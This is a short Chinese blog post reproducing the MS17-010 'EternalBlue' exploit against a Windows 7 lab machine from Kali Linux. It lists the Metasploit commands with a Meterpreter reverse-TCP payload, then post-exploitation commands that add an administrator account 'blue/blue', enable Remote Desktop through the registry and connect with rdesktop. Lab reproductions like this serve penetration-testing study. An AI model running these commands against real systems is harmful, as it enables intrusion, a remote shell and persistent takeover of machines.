技术篇渗透测试

MS17-010(永恒之蓝)漏洞复现

2019-02-09  本文已影响261人  泽英君

开篇闲聊:

最后一篇,写完就睡觉。

漏洞概述:

就是传说中的永恒之蓝,百度上介绍的够详细了,不过我这个复现只是简易版本QAQ

复现环境:

Windows 7

Kail linux

复现过程:

直接开启神器搜索漏洞模块

root@wuyou:~# msfconsole

msf > search ms17-010

exploit/windows/smb/ms17_010_psexec为最新模块,成功率更高,但是有些情况下会出现要求指定SMBUser及SMBPass

这里我先用搜索模块对靶机进行漏洞扫描

结果为存在漏洞

使用攻击模块,填写信息

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.190.131

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/ms17_010_eternalblue) > exploit

攻击成功

这里顺便再说一点后渗透命令吧:

创建用户名密码 blue/blue 

C:\Windows\system32>net user blue blue /add

将用户blue添加入管理组

C:\Windows\system32>net localgroup administrators blue /add

开启远程桌面功能 

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

远程桌面连接Win7

root@wuyou:~# rdesktop 192.168.190.131:3389

上一篇下一篇

猜你喜欢

热点阅读